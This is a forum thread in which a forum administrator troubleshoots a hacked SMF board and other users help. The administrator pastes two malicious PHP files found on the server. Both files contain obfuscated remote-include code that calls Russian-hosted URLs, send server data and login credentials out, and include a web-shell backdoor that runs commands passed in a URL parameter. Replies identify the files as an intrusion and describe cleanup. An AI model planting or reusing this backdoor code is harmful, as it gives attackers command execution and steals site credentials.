Not touched the board in ages.. now I get this error??
Parse error: syntax error, unexpected $end in /home/***/public_html/yabbse/index.php on line 213
Any ideas??
Thanks
version of smf?
mods installed?
Sorry forgot about that.. 1.07. Just got shoutbox and online users.
Was fine lastnight, got a few emails today from various members this morning saying about this error?
www.otf.org.uk/yabbse is the address of my board. (forgot that too!)
Almost impossible to debug that kind of error message without going through the source commenting out blocks of code to see where the problem is arrising.
Hi,
Just had a look, and it seems a load of files where 'updated' at the time this error started.
Going to try a restore :D
reminds me of this thread
http://www.tinyportal.net/smf/index.php?topic=5856.0
Maybe you have the same host?
Just looked thru these updated files. Looks like they have been truncated. Quite a few in various subdirectories too.
Will have a look at the above link.
Just been trying to replace the odd file with the default SimpleMachines one. It looks like a load of .php have been truncated almost chopped in half?!
Very odd indeed. Looks like it happened just before 1am this morning.
In my tmp directory I have two files too (again created at the same time)..
create.php
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
and
base.php
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
Anything to do with my problems??
That code looks pretty suspicious.
It seems to try contacting another remote php script (http://bis.iframe.ru/master.php) with some arguments.
(like REMOTE_ADDR, SERVER_NAME & $user_auth)
/me suspects a hacking attempt.
Delete those files immediatally, clear out the bad code from your .htaccess files, and reupload all SMF files. You should also change all passwords. More information can be found here (http://forums.asmallorange.com/index.php?showtopic=5815).
Hi,
Have just gone thru zapping any files that were changed at around 1am this morning.
Changed password.
Changed perms on folders (been set to read/write/exec!)
Requested restore from host.
Thanks for all your help!
how did they get in?
Havent been hacked before :(
Lainaus käyttäjältä: PioneeR - kesäkuu 24, 2006, 01:09:34 IP
how did they get in?
Havent been hacked before :(
I don't really know how it's getting in. I doesn't seem to be an issue with SMF though, since there are other reports of it with people not using SMF.
Yeah, I read about all kinds of scripts being infected. Doesnt look good though :(
My forum is back up now though :)
Another site has been hit.. this time a mambo one :(
At least I know what to do this time!